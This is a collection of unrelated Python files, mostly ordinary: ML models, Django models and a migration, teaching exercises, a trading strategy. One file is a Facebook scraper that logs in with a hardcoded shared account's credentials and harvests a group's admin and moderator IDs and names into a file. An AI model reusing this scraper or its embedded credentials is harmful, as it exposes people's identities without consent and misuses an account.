f.readline()
s = f.readline().rstrip()
# Get rid of first space
s = s.split(' ')
nothing = ' '
return nothing.join(s[1:])
def create_pref_file(toolkit_path, download_path):
import os
# Put data download path into preferences file
with open(os.path.join(toolkit_path, 'mvn_toolkit_prefs.txt'), 'w') as f:
f.write("'; IDL Toolkit Data Preferences File'\n")
f.write('mvn_root_data_dir: ' + download_path)
return
def set_new_data_root_dir():
import os
# Get new preferred data download location for pyspedas project
valid_path = input("Enter directory preference: ")
while not os.path.exists(valid_path):
valid_path = input("Specified path does not exist. Enter new path: ")
download_path = valid_path
print("root_data_dir set to " + download_path)
# Edit the pyspedas pref file to reflect the new data download location
pref_file = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', 'spd_prefs_txt.py'))
with open(pref_file, 'r') as f:
content = f.readlines()
content[3] = 'data_dir = \'{}\'\n'.format(download_path)
with open(pref_file, 'w') as f:
for line in content:
f.write(line)
# Also edit the mvn_toolkit_prefs file to reflect the new data download location
full_path = os.path.realpath(__file__)
toolkit_path = os.path.dirname(full_path)
create_pref_file(toolkit_path, download_path)
def get_new_files(files_on_site, data_dir, instrument, level):
import os
import re
fos = files_on_site
files_on_hd = []
for (dir, _, files) in os.walk(data_dir):
for f in files:
if re.match('mvn_' + instrument + '_' + level + '_*', f):
files_on_hd.append(f)
x = set(files_on_hd).intersection(files_on_site)
for matched_file in x:
fos.remove(matched_file)
return fos
def create_dir_if_needed(f, data_dir, level):
import os
if level == 'insitu':
year, month, _ = get_year_month_day_from_kp_file(f)
else:
year, month, _ = get_year_month_day_from_sci_file(f)
if not os.path.exists(os.path.join(data_dir, year, month)):
os.makedirs(os.path.join(data_dir, year, month))
full_path = os.path.join(data_dir, year, month)
return full_path
def get_year_month_day_from_kp_file(f):
date_string = f.split('_')[3]
year = date_string[0:4]
month = date_string[4:6]
day = date_string[6:8]
return year, month, day
def get_year_month_day_from_sci_file(f):
m = l2_regex.match(f)
year = m.group('year')
month = m.group('month')
day = m.group('day')
return year, month, day
def display_progress(x, y):
num_stars = int(round(float(x) / y * 70))
print("||" + "*" * num_stars + "-" * (70 - num_stars) + "||" + " ( " + str(round(100 * float(x) / y)) + "% )")
return
def get_uname_and_password():
global uname
global pword
import getpass
uname = input("Enter user name to access the team website: ")
pword = getpass.getpass("Enter your password: ")
return
|
py | 7df7c1e974bb0ec6d6c65ced693f2c41261c5922 | """
Demonstrates using OBJECTS via Turtle Graphics.
Concepts include:
-- CONSTRUCT an INSTANCE of a CLASS (we call such instances OBJECTS).
-- Make an object ** DO ** something by using a METHOD.
-- Reference an object's ** DATA ** by using an INSTANCE VARIABLE.
Also:
-- ASSIGNING a VALUE to a NAME (VARIABLE).
Authors: David Mutchler, Vibha Alangar, Matt Boutell, Dave Fisher,
Aaron Wilkin, their colleagues, and Ryo.
"""
###############################################################################
#
# DONE: 1.
# Yes, that means for YOU to DO things per the following instructions:
#
# On Line 13 above, replace PUT_YOUR_NAME_HERE with your OWN name.
#
# BTW, the top block of text above forms what is called a DOC-STRING.
# It documents what this module does, in a way that exterior programs
# can make sense of. It has no other effect on this program.
#
###############################################################################
import rosegraphics as rg
###############################################################################
#
# DONE: 2.
# Allow this module to use the rosegraphics.py module by marking the
# src
# folder in this project as a "Sources Root", as follows:
#
# In the Project window (to the left), right click on the src folder,
# then select Mark Directory As ~ Sources Root.
#
# You will see that rosegraphics in the import statement above (line 28)
# is no longer marked as an error. You will do this in all projects
# that use rosegraphics, so get used to it. :)
#
# Once rosegraphics in the import statement is no longer marked as error,
# change this _TODO_ to DONE and ** continue to the next _TODO_ (below). **
#
###############################################################################
###############################################################################
#
# TODO: 3.
# Run this module. A window will pop up and Turtles will move around.
# After the Turtles stop moving,
# ** click anywhere in the window to close the window **.
#
# Then look at the code below. Raise your hand when you have questions about
# what the code is doing. Be sure that you understand the notations for:
#
# -- CONSTRUCTING an instance of a CLASS, e.g.
# rg.SimpleTurtle()
#
# -- ASSIGNING the resulting OBJECT (instance of a class) a NAME, e.g.
# natasha = rg.SimpleTurtle()
#
# -- Applying a METHOD to an object to make the object DO something, e.g.
# natasha.forward(100)
#
# -- Accessing an INSTANCE VARIABLE of an object, e.g.
# natasha.speed = 10
# boris.speed = natasha.speed
#
# After you are confident that you understand all the code below,
# change this _TODO_ to DONE and ** continue to the next _TODO_ (below). **
#
###############################################################################
# -----------------------------------------------------------------------------
# The next few lines show how to:
# - CONSTRUCT (make and initialize) a TurtleWindow object for animation.
# The definition of a TurtleWindow is in the rg
# (shorthand for rosegraphics) module.
# -----------------------------------------------------------------------------
window = rg.TurtleWindow()
window.delay(20) # Bigger numbers mean slower animation.
# -----------------------------------------------------------------------------
# The next few lines show how to:
# - CONSTRUCT (make) a SimpleTurtle object and ASSIGN a NAME to the object.
# -----------------------------------------------------------------------------
boris = rg.SimpleTurtle()
# -----------------------------------------------------------------------------
# The next few lines show how to:
# - Ask the SimpleTurtle object to do things by applying METHODs to it.
# The numbers in the parentheses are called ARGUMENTS.
# -----------------------------------------------------------------------------
boris.forward(100)
boris.left(90)
boris.forward(200)
# -----------------------------------------------------------------------------
# The next few lines show how to:
# - Construct a second SimpleTurtle,
# set its pen and speed INSTANCE VARIABLES, and ask it to do things.
# -----------------------------------------------------------------------------
natasha = rg.SimpleTurtle('turtle')
natasha.pen = rg.Pen('red', 30) # Second argument is the Pen's thickness
natasha.speed = 5 # Bigger means faster, max is usually about 10
natasha.backward(50)
natasha.right(90)
natasha.forward(125)
natasha.speed = 1 # Now slower
natasha.go_to(rg.Point(-100, 200))
###############################################################################
#
# DONE: 4.
# Add a few more lines of your own code to make one of the existing
# SimpleTurtles move some more and/or have different characteristics.
#
# ** Nothing fancy is required. **
# ** A SUBSEQUENT exercise will let you show your creativity. **
#
# As always, test by running the module.
#
###############################################################################
Ryo = rg.SimpleTurtle()
Ryo.pen = rg.Pen('blue', 60)
Ryo.speed = 10
Ryo.right(90)
Ryo.backward(80)
Ryo.left(45)
Ryo.backward(90)
###############################################################################
#
# TODO: 5.
# The above code CONSTRUCTS two SimpleTurtle objects
# and gives those objects NAMES:
# boris natasha
#
# Add code of your own that constructs another SimpleTurtle object,
# naming it whatever you want. Names cannot have spaces or special
# characters, but they can have digits and underscores, e.g.
# this_1_has
#
# STYLE RULE: Your names should always begin with a LOWER_CASE letter.
# So mary is OK but Mary is NOT OK.
#
# Then add more code that:
# -- Constructs a Pen object,
# -- assigns your SimpleTurtle's pen to the constructed Pen object, and
# -- makes your SimpleTurtle move around a bit.
#
# ** Nothing fancy is required. **
# ** A SUBSEQUENT exercise will let you show your creativity. **
#
# As always, test by running the module.
#
###############################################################################
###############################################################################
#
# TODO: 6.
# Ensure that no blue bars on the scrollbar-thing to the right remain.
# Run one more time to be sure that all is still OK.
#
# Then COMMIT-and-PUSH your work as before:
# 1. Select VCS from the menu bar (above).
# 2. Choose Commit from the pull-down menu that appears.
# 3. In the Commit Changes window that pops up,
# press the Commit and Push button.
# (Note: If you see only a Commit button:
# - HOVER over the Commit button
# (in the lower-right corner of the window)
# - CLICK on Commit and Push.)
#
# You can COMMIT-and-PUSH as often as you like.
# DO IT FREQUENTLY; AT LEAST once per module.
#
###############################################################################
# -----------------------------------------------------------------------------
# The next line keeps the window open until the user clicks in the window.
# Throughout this exercise, this close_on_mouse_click line
# should be the LAST line in the file. DO NOT ADD CODE BELOW THIS LINE!
# -----------------------------------------------------------------------------
window.close_on_mouse_click()
|
py | 7df7c21d0312f19fd320da5f9a3063e188652399 | from number_theory import divisor_sums_to
def p21(number: int) -> int:
divisor_sums = divisor_sums_to(number)
amicable_sum = 0
for a in range(1, number):
b = divisor_sums[a]
if a == b or b >= number: continue
b_sum = divisor_sums[b]
if b_sum >= number: continue
if a == b_sum: amicable_sum += a
return amicable_sum
if __name__ == '__main__':
print(p21(301))
print(p21(10000))
|
py | 7df7c22955e3fb5faea24b1e181e162ecadc3897 | '''DLA in PyTorch.
Reference:
Deep Layer Aggregation. https://arxiv.org/abs/1707.06484
'''
import torch
import torch.nn as nn
import torch.nn.functional as F
from ..registry import register_model
__all__ = ['DLA']
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, in_planes, planes, stride=1):
super(BasicBlock, self).__init__()
self.conv1 = nn.Conv2d(
in_planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3,
stride=1, padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.shortcut = nn.Sequential()
if stride != 1 or in_planes != self.expansion*planes:
self.shortcut = nn.Sequential(
nn.Conv2d(in_planes, self.expansion*planes,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(self.expansion*planes)
)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.bn2(self.conv2(out))
out += self.shortcut(x)
out = F.relu(out)
return out
class Root(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=1):
super(Root, self).__init__()
self.conv = nn.Conv2d(
in_channels, out_channels, kernel_size,
stride=1, padding=(kernel_size - 1) // 2, bias=False)
self.bn = nn.BatchNorm2d(out_channels)
def forward(self, xs):
x = torch.cat(xs, 1)
out = F.relu(self.bn(self.conv(x)))
return out
class Tree(nn.Module):
def __init__(self, block, in_channels, out_channels, level=1, stride=1):
super(Tree, self).__init__()
self.level = level
if level == 1:
self.root = Root(2*out_channels, out_channels)
self.left_node = block(in_channels, out_channels, stride=stride)
self.right_node = block(out_channels, out_channels, stride=1)
else:
self.root = Root((level+2)*out_channels, out_channels)
for i in reversed(range(1, level)):
subtree = Tree(block, in_channels, out_channels,
level=i, stride=stride)
self.__setattr__('level_%d' % i, subtree)
self.prev_root = block(in_channels, out_channels, stride=stride)
self.left_node = block(out_channels, out_channels, stride=1)
self.right_node = block(out_channels, out_channels, stride=1)
def forward(self, x):
xs = [self.prev_root(x)] if self.level > 1 else []
for i in reversed(range(1, self.level)):
level_i = self.__getattr__('level_%d' % i)
x = level_i(x)
xs.append(x)
x = self.left_node(x)
xs.append(x)
x = self.right_node(x)
xs.append(x)
out = self.root(xs)
return out
class DLA(nn.Module):
def __init__(self, block=BasicBlock, num_classes=10):
super(DLA, self).__init__()
self.base = nn.Sequential(
nn.Conv2d(3, 16, kernel_size=3, stride=1, padding=1, bias=False),
nn.BatchNorm2d(16),
nn.ReLU(True)
)
self.layer1 = nn.Sequential(
nn.Conv2d(16, 16, kernel_size=3, stride=1, padding=1, bias=False),
nn.BatchNorm2d(16),
nn.ReLU(True)
)
self.layer2 = nn.Sequential(
nn.Conv2d(16, 32, kernel_size=3, stride=1, padding=1, bias=False),
nn.BatchNorm2d(32),
nn.ReLU(True)
)
self.layer3 = Tree(block, 32, 64, level=1, stride=1)
self.layer4 = Tree(block, 64, 128, level=2, stride=2)
self.layer5 = Tree(block, 128, 256, level=2, stride=2)
self.layer6 = Tree(block, 256, 512, level=1, stride=2)
self.linear = nn.Linear(512, num_classes)
def forward(self, x):
out = self.base(x)
out = self.layer1(out)
out = self.layer2(out)
out = self.layer3(out)
out = self.layer4(out)
out = self.layer5(out)
out = self.layer6(out)
out = F.avg_pool2d(out, 4)
out = out.view(out.size(0), -1)
out = self.linear(out)
return out
@register_model
def dla():
return DLA()
def test():
net = DLA()
print(net)
x = torch.randn(1, 3, 32, 32)
y = net(x)
print(y.size())
if __name__ == '__main__':
test()
|
py | 7df7c2d0580169f0f94607c90b6aab58c36cbbe8 | import unittest
from typing import Any, List
from hstest.check_result import CheckResult
from hstest.stage_test import StageTest
from hstest.test_case import TestCase
class TestImportPackage2(StageTest):
def generate(self) -> List[TestCase]:
return [TestCase()]
def check(self, reply: str, attach: Any) -> CheckResult:
return CheckResult(reply == '10\n', '')
@unittest.skip('Relative imports doesn\'t work')
class Test(unittest.TestCase):
def test(self):
status, feedback = TestImportPackage2('random_module.main').run_tests()
self.assertEqual("test OK", feedback)
if __name__ == '__main__':
Test().test()
|
py | 7df7c3eaf4a2b659ce134c226e5b048d8b4dba72 | import tensorflow as tf
from nets import resnet_v1
from preprocessing import vgg_preprocessing
from ..utils.upsampling import bilinear_upsample_weights
slim = tf.contrib.slim
# Mean values for VGG-16
from preprocessing.vgg_preprocessing import _R_MEAN, _G_MEAN, _B_MEAN
def extract_resnet_v1_101_mapping_without_logits(resnet_v1_101_variables_mapping):
"""Removes the logits variable mapping from resnet_v1_101_16s to resnet_v1_101 model mapping dict.
Given the resnet_v1_101_16s to resnet_v1_101 model mapping dict which is returned by
resnet_v1_101_16s() function, remove the mapping for the fc8 variable. This is done because this
variable is responsible for final class prediction and is different for different
tasks. Last layer usually has different size, depending on the number of classes
to be predicted. This is why we omit it from the dict and those variables will
be randomly initialized later.
Parameters
----------
resnet_v1_101_variables_mapping : dict {string: variable}
Dict which maps the resnet_v1_101_16s model's variables to resnet_v1_101 checkpoint variables
names. Look at resnet_v1_101_16s() function for more details.
Returns
-------
updated_mapping : dict {string: variable}
Dict which maps the resnet_v1_101_16s model's variables to resnet_v1_101 checkpoint variables
names without logits layer mapping.
"""
# TODO: review this part one more time
resnet_v1_101_keys = resnet_v1_101_variables_mapping.keys()
resnet_v1_101_without_logits_keys = []
for key in resnet_v1_101_keys:
if 'logits' not in key:
resnet_v1_101_without_logits_keys.append(key)
updated_mapping = {key: resnet_v1_101_variables_mapping[key] for key in resnet_v1_101_without_logits_keys}
return updated_mapping
def resnet_v1_101_16s(image_batch_tensor,
number_of_classes,
is_training):
"""Returns the resnet_v1_101_16s model definition.
The function returns the model definition of a network that was described
in 'DeepLab: Semantic Image Segmentation with Deep Convolutional Nets,
Atrous Convolution, and Fully Connected CRFs' by Chen et al.
The network subsamples the input by a factor of 16 and uses the bilinear
upsampling kernel to upsample prediction by a factor of 16. This means that
if the image size is not of the factor 16, the prediction of different size
will be delivered. To adapt the network for an any size input use
adapt_network_for_any_size_input(resnet_v1_101_16s, 16). Note: the upsampling kernel
is fixed in this model definition, because it didn't give significant
improvements according to aforementioned paper.
Parameters
----------
image_batch_tensor : [batch_size, height, width, depth] Tensor
Tensor specifying input image batch
number_of_classes : int
An argument specifying the number of classes to be predicted.
For example, for PASCAL VOC it is 21.
is_training : boolean
An argument specifying if the network is being evaluated or trained.
Returns
-------
upsampled_logits : [batch_size, height, width, number_of_classes] Tensor
Tensor with logits representing predictions for each class.
Be careful, the output can be of different size compared to input,
use adapt_network_for_any_size_input to adapt network for any input size.
Otherwise, the input images sizes should be of multiple 8.
resnet_v1_101_16s_variables_mapping : dict {string: variable}
Dict which maps the resnet_v1_101_16s model's variables to resnet_v1_101 checkpoint variables
names. We need this to initilize the weights of resnet_v1_101_16s model with resnet_v1_101 from
checkpoint file. Look at ipython notebook for examples.
"""
with tf.variable_scope("resnet_v1_101_16s") as resnet_v1_101_16s:
upsample_factor = 16
# Convert image to float32 before subtracting the
# mean pixel value
image_batch_float = tf.to_float(image_batch_tensor)
# Subtract the mean pixel value from each pixel
mean_centered_image_batch = image_batch_float - [_R_MEAN, _G_MEAN, _B_MEAN]
upsample_filter_np = bilinear_upsample_weights(upsample_factor,
number_of_classes)
upsample_filter_tensor = tf.constant(upsample_filter_np)
# TODO: make pull request to get this custom vgg feature accepted
# to avoid using custom slim repo.
with slim.arg_scope(resnet_v1.resnet_arg_scope()):
logits, end_points = resnet_v1.resnet_v1_101(mean_centered_image_batch,
number_of_classes,
is_training=is_training,
global_pool=False,
output_stride=16)
downsampled_logits_shape = tf.shape(logits)
# Calculate the ouput size of the upsampled tensor
upsampled_logits_shape = tf.stack([
downsampled_logits_shape[0],
downsampled_logits_shape[1] * upsample_factor,
downsampled_logits_shape[2] * upsample_factor,
downsampled_logits_shape[3]
])
# Perform the upsampling
upsampled_logits = tf.nn.conv2d_transpose(logits,
upsample_filter_tensor,
output_shape=upsampled_logits_shape,
strides=[1, upsample_factor, upsample_factor, 1])
# Map the original vgg-16 variable names
# to the variables in our model. This is done
# to make it possible to use assign_from_checkpoint_fn()
# while providing this mapping.
# TODO: make it cleaner
resnet_v1_101_16s_variables_mapping = {}
resnet_v1_101_16s_variables = slim.get_variables(resnet_v1_101_16s)
for variable in resnet_v1_101_16s_variables:
# Here we remove the part of a name of the variable
# that is responsible for the current variable scope
original_resnet_v1_101_checkpoint_string = variable.name[len(resnet_v1_101_16s.original_name_scope):-2]
resnet_v1_101_16s_variables_mapping[original_resnet_v1_101_checkpoint_string] = variable
return upsampled_logits, resnet_v1_101_16s_variables_mapping
|
py | 7df7c4446c9f6f5bbf57443273c8724adf32f941 | from django.db import models
class Location(models.Model):
"""
Class that contains location details of the image posted
"""
name = models.CharField(max_length = 15)
description = models.TextField()
def __str__(self):
return self.name
def save_location(self):
self.save()
def del_location(self):
self.delete()
class Category(models.Model):
"""
Class that contains the category details of the image posted
"""
name = models.CharField(max_length = 15)
description = models.TextField()
def __str__(self):
return self.name
def save_cat(self):
self.save()
def del_cat(self):
self.delete()
class Image(models.Model):
"""
Class that contains details concerning the image itself
"""
photo = models.ImageField(upload_to = 'images/')
name = models.CharField(max_length = 25)
description = models.TextField()
location = models.ForeignKey(Location)
category = models.ForeignKey(Category)
# up_date = models.DateTimeField(auto_now_add=True)
def __str__(self):
return self.name
def save_image(self):
self.save()
def delete_image(self):
self.save()
# @classmethod
# def get_image_by_id(cls, id):
# image = Image.objects.get(id=id)
# return image
@classmethod
def get_image_by_id(cls, id):
image = Image.objects.get(id=id)
return image
@classmethod
def filter_by_location(cls, id):
image = Image.objects.filter(location_id=id).all()
return image
@classmethod
def get_images(cls):
images = Image.objects.all()
return images
@classmethod
def search_image(cls, category):
images = cls.objects.filter(category__name__icontains=category)
return images
|
py | 7df7c52021f41ab26319e80b3e5031347965ecf6 | '''
5. Faça um Programa que leia 20 números inteiros e armazene-os num vetor. Armazene os números pares no vetor PAR e os
números IMPARES no vetor impar. Imprima os três vetores
'''
numeros = list()
pares = list()
impares = list()
for i in range(20):
numeros.append(int(input(f'Num {i+1}: ')))
if numeros[i] % 2 == 0:
pares.append(numeros[i])
elif numeros[i] % 2 == 1:
impares.append(numeros[i])
print(f'\nNúmeros lidos: ', end='')
print(*numeros)
print(f'Números pares: ', end='')
print(*pares)
print(f'Números impares: ', end='')
print(*impares)
|
py | 7df7c660da850096e6151211c8113ea21ba9a140 | import requests
from bs4 import BeautifulSoup
from http.cookiejar import LWPCookieJar as kuki
import sys
import mechanize
import os
if sys.platform in ["linux","linux2"]:
G = "\033[32m"
R = "\033[31m"
Y = "\033[33m"
BB = "\033[1m"
B = "\033[0m"
U = "\033[35m"
cl = "clear"
rm = "rm -rf cookies.txt"
make = "touch cookies.txt"
else:
G = " "
R = " "
Y = " "
BB = " "
U = " "
B = " "
cl = "cls"
rm = "del cookies.txt"
make = "copy nul cookies.txt"
logo = f""" {G}TermuxOps Official{B}{R}{BB}
.'\ /`.
.'.-.`-'.-.`.
..._: .-. .-. :_...
.' '-.({G}o{R} ) ({G}o{R} ).-' `.
{R} : _ _ _`~(_)~`_ _ _ :
: /: ' .-=_ _=-. ` ;\ :
: :|-.._ ' ` _..-|: :
: `:| |`:-:-.-:-:'| |:' :
`. `.| | | | | | |.' .'
`. `-:_| | |_:-' .'
`-._ ```` _.-'
``-------''{G}
[ Created By : Hagir$ ]
{U} Get Admin & Moderator ID {B}
"""
s = requests.Session()
member = []
def show():
f = open("id.txt","a")
count = len(member)
print(f"{BB}Name Group : { title }{B}")
print("-"*50)
for x in member:
url = "https://mbasic.facebook.com/" + str(x)
uri = s.get(url).text
soup = BeautifulSoup(uri, "html.parser")
print(str(x) +" -> "+ soup.title.string.split("|")[0])
x = x + "\n"
f.write(x)
print("-"*50)
os.system(rm)
print(f"Count : {count}")
input("[ AGAIN ]")
os.system("clear")
menu(logo)
def get_id(param):
try:
url = "https://mbasic.facebook.com/" + param[0]
data = []
uri = s.get(url).text
soup = BeautifulSoup(uri, "html.parser")
for x in soup.find_all("table"):
data.append(x.get('id'))
for x in range(len(data)):
if "member" in str(data[x]):
member.append(data[x].split("_")[1])
show()
except:
show()
def process_3(param):
print(f"{G}{BB}[ * ] Success : Retrieve Admod ID{B}")
url = "https://mbasic.facebook.com/" + param[0]
uri = s.get(url).text
data = []
param = []
data2 = []
soup = BeautifulSoup(uri, "html.parser")
for x in soup.find_all("table"):
data.append(x.get('id'))
for x in range(len(data)):
if "member" in str(data[x]):
member.append(data[x].split("_")[1])
for x in soup.find_all("a"):
data2.append(x.get('href'))
for x in range(len(data2)):
if "/browse/" in str(data2[x]):
param.append(data2[x])
get_id(param)
def process_2(param):
print(f"{G}[ * ] Processing : View List Admin And Moderator{B}")
url = "https://mbasic.facebook.com/"+param[0]
data = []
param = []
uri = s.get(url).text
soup = BeautifulSoup(uri,"html.parser")
for x in soup.find_all("a"):
data.append(x.get('href'))
for x in range(len(data)):
if "list_admin_moderator" in str(data[x]):
param.append(data[x])
process_3(param)
def process_1(user,target):
global title
print(f"{G}[ * ] Processing : View Member Data{B}")
url = 'https://mbasic.facebook.com/groups/'+target +"/"
s.cookies = kuki('cookies.txt')
s.cookies.load()
uri = s.get(url).text
data = []
param = []
soup = BeautifulSoup(uri, "html.parser")
title = soup.title.string.split("|")[0]
for x in soup.find_all("a"):
data.append(x.get('href'))
for x in range(len(data)):
if "?view=members" in str(data[x]):
param.append(data[x])
process_2(param)
def login(user,pwd,target):
print(f"{G}[ * ] Logging in {B}")
cj = kuki('cookies.txt')
try:
data = []
br = mechanize.Browser()
br.set_cookiejar(cj)
br.set_handle_gzip(True)
br.set_handle_redirect(True)
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/12.0.1987/37.7327; U; pl) Presto/2.12.423 Version/12.16')]
br.open('https://mbasic.facebook.com/login')
br._factory.is_html = True
br.select_form(nr = 0)
br.form['email'] = user
br.form['pass'] = pwd
sub = br.submit().read()
if "doesn't match" in str(sub):
print("\033[31m[ x ] Username Or Password Wrong\033[0m")
os.system(rm)
if "checkpoint" in str(sub):
print(R + "[ x ] Account Checkpoint" + B)
os.system(rm)
else:
os.system(make)
cj.save()
process_1(user,target)
except:
print(f"{R} [ ! ] Failed{B}")
input("[ AGAIN ]")
os.system("clear")
menu(logo)
def menu(banner=None):
print(banner)
target = str(input("[?] ID Group : "))
if len(target) < 1:
os.system("clear")
print(f"{R} Empty -_- {B}")
print(f"{BB} Type {G}Exit{B} to exit the program{B}")
menu(logo)
if target == "exit":
os.system("clear")
print(f"{R} Thanks You :) {B}")
exit(1)
note = str(input("Use a server account? (y/n)"))
if note == "y":
login("92349545712483","512483",target)
if note == "n":
print(f"{BB}[ * ] Login Facebook{B}")
usr = input(f"{U}[ ? ]{BB} Username : ")
pwd = input(f"{U}[ ? ]{BB} Password : ")
login(usr,pwd,target)
else:
os.system("clear")
print(f"{R} Command Not Found{B}")
menu(logo)
menu(logo)
|
py | 7df7c7f40ec2ed26e09aebf687d844cc5623a679 | # -*- coding:utf-8 -*-
"""
固定数量模式CTA主策略演示
Project: alphahunter
Author: HJQuant
Description: Asynchronous driven quantitative trading framework
"""
import sys
import copy
import asyncio
from abc import ABCMeta, abstractmethod
from quant import const
from quant.state import State
from quant.utils import tools, logger
from quant.config import config
from quant.market import Market, Kline, Orderbook, Trade, Ticker
from quant.order import Order, Fill, ORDER_ACTION_BUY, ORDER_ACTION_SELL, ORDER_STATUS_FILLED, ORDER_TYPE_MARKET, ORDER_TYPE_IOC
from quant.position import Position
from quant.asset import Asset
from quant.tasks import LoopRunTask, SingleTask
from quant.trader import Trader
from quant.strategy import Strategy
from quant.utils.decorator import async_method_locker
from quant.interface.model_api import ModelAPI
from nr import RsiModel, CciModel, MaModel
class CTAController(Strategy):
def __init__(self):
""" 初始化
"""
super(CTAController, self).__init__()
#指定这个主策略下面管理了NrModel这个模型
self.models = [RsiModel(), CciModel(), MaModel()]
#NrModel关心‘btc’,所以主策略也会关心
self.coins = ['BTC']
#初始资产列表
self.init_assets = None
#当前仓位
self.current_position = {
'BTC': 0
}
#目标仓位
self.target_position = {
'BTC': 0
}
#主策略差值仓位,即需要调仓的部分:当前仓位距离目标仓位的差距
self.delta_position = {
'BTC': 0
}
#是否需要停止策略
self.is_stop = False
def model_consolidation(self):
""" 模型组合
"""
is_stop = True
#根据各个模块,统计总的目标仓位
for model in self.models:
for coin in self.coins:
self.target_position[coin] = 0
for coin in self.coins:
self.target_position[coin] += model.target_position[coin]
#只有所有model都是停止状态后策略才会停止,只要有一个model还在运行,就不能停止
if model.running_status == 'running':
is_stop = False
self.is_stop = is_stop
#计算当前仓位距离目标仓位的距离,即调仓目标
for coin in self.coins:
self.delta_position[coin] = self.target_position[coin] - self.current_position[coin]
async def on_time(self):
""" 每5秒执行一次
"""
#对model循环,获取model最新信号
for model in self.models:
await model.on_time()
#调用model_consolidation, 更新目标仓位等信息
self.model_consolidation()
#根据差值仓位来下单
await self.submit_orders(self.delta_position)
async def on_kline_update_callback(self, kline: Kline):
""" 市场K线更新
"""
#对model循环,获取model最新信号
for model in self.models:
await model.on_kline_update_callback(kline)
#调用model_consolidation, 更新目标仓位等信息
self.model_consolidation()
#根据差值仓位来下单
await self.submit_orders(self.delta_position)
async def on_asset_update_callback(self, asset: Asset):
""" 账户资产更新
"""
if not self.init_assets:
self.init_assets = copy.deepcopy(asset.assets) #初始资产列表,只会获取一次
#获取当前持仓
for coin in self.coins:
self.current_position[coin] = asset.assets[coin]["total"] - self.init_assets[coin]["total"]
@abstractmethod
async def submit_orders(self, delta_position):
""" 根据当前最新的self.delta_position来执行下单操作
""" |
py | 7df7c83ee34ac615e9551017115e82c475cd5e40 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2017-08-11 20:45
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('stats', '0002_auto_20151109_0319'),
('regions', '0006_auto_20170216_1730'),
]
operations = [
migrations.CreateModel(
name='RegionCohorts',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('gender', models.CharField(blank=True, choices=[('Female', 'Female'), ('Male', 'Male')], max_length=30, verbose_name='Gender')),
('ethnicity', models.CharField(blank=True, choices=[('White', 'White'), ('Hispanic', 'Hispanic'), ('African American', 'African American'), ('Others', 'Others')], max_length=30, verbose_name='Ethnicity')),
('economic_status', models.CharField(blank=True, choices=[('Economically Disadvantaged', 'Economically Disadvantaged'), ('Not Economically Disadvantaged', 'Not Economically Disadvantaged')], max_length=30, verbose_name='Economic status')),
('enrolled_8th', models.IntegerField(null=True)),
('enrolled_9th', models.IntegerField(null=True)),
('enrolled_9th_percent', models.FloatField(null=True)),
('enrolled_10th', models.IntegerField(null=True)),
('enrolled_10th_percent', models.FloatField(null=True)),
('lessthan_10th_enrolled', models.IntegerField(null=True)),
('lessthan_10th_enrolled_percent', models.FloatField(null=True)),
('graduated', models.IntegerField(null=True)),
('graduated_percent', models.FloatField(null=True)),
('enrolled_4yr', models.IntegerField(null=True)),
('enrolled_4yr_percent', models.FloatField(null=True)),
('enrolled_2yr', models.IntegerField(null=True)),
('enrolled_2yr_percent', models.FloatField(null=True)),
('enrolled_out_of_state', models.IntegerField(null=True)),
('enrolled_out_of_state_percent', models.IntegerField(null=True)),
('total_enrolled', models.IntegerField(null=True)),
('total_enrolled_percent', models.FloatField(null=True)),
('enrolled_wo_record', models.IntegerField(null=True)),
('enrolled_wo_record_percent', models.FloatField(null=True)),
('total_degrees', models.IntegerField(null=True)),
('total_degrees_percent', models.FloatField(null=True)),
('bacc', models.IntegerField(null=True)),
('bacc_acc', models.IntegerField(null=True)),
('bacc_cert', models.IntegerField(null=True)),
('assoc', models.IntegerField(null=True)),
('accoc_cert', models.IntegerField(null=True)),
('cert', models.IntegerField(null=True)),
('region', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='cohorts', to='regions.Region')),
('year', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='region_cohorts', to='stats.SchoolYear')),
],
options={
'verbose_name_plural': 'Region cohorts',
},
),
migrations.AlterUniqueTogether(
name='regioncohorts',
unique_together=set([('region', 'year', 'gender', 'ethnicity', 'economic_status')]),
),
]
|
py | 7df7c86843d13725911d08b146a9c1e23b9058df | import matplotlib.pyplot as plt
import keras
# save loss, acc
class LossHistory(keras.callbacks.Callback):
def on_train_begin(self, logs={}):
self.losses = {'batch': [], 'epoch': []}
self.accuracy = {'batch': [], 'epoch': []}
self.val_loss = {'batch': [], 'epoch': []}
self.val_acc = {'batch': [], 'epoch': []}
def on_batch_end(self, batch, logs={}):
self.losses['batch'].append(logs.get('loss'))
self.accuracy['batch'].append(logs.get('acc'))
self.val_loss['batch'].append(logs.get('val_loss'))
self.val_acc['batch'].append(logs.get('val_acc'))
def on_epoch_end(self, batch, logs={}):
self.losses['epoch'].append(logs.get('loss'))
self.accuracy['epoch'].append(logs.get('acc'))
self.val_loss['epoch'].append(logs.get('val_loss'))
self.val_acc['epoch'].append(logs.get('val_acc'))
def loss_plot(self, loss_type):
iters = range(len(self.losses[loss_type]))
plt.figure()
# acc
plt.plot(iters, self.accuracy[loss_type], lw=1.5, color='r', label='train acc', marker='.', markevery=2,
mew=1.5)
# loss
plt.plot(iters, self.losses[loss_type], lw=1.5, color='g', label='train loss', marker='.', markevery=2, mew=1.5)
if loss_type == 'epoch':
# val_acc
plt.plot(iters, self.val_acc[loss_type], lw=1.5, color='b', label='val acc', marker='.', markevery=2,
mew=1.5)
# val_loss
plt.plot(iters, self.val_loss[loss_type], lw=1.5, color='darkorange', label='val loss', marker='.',
markevery=2, mew=1.5)
plt.grid(True)
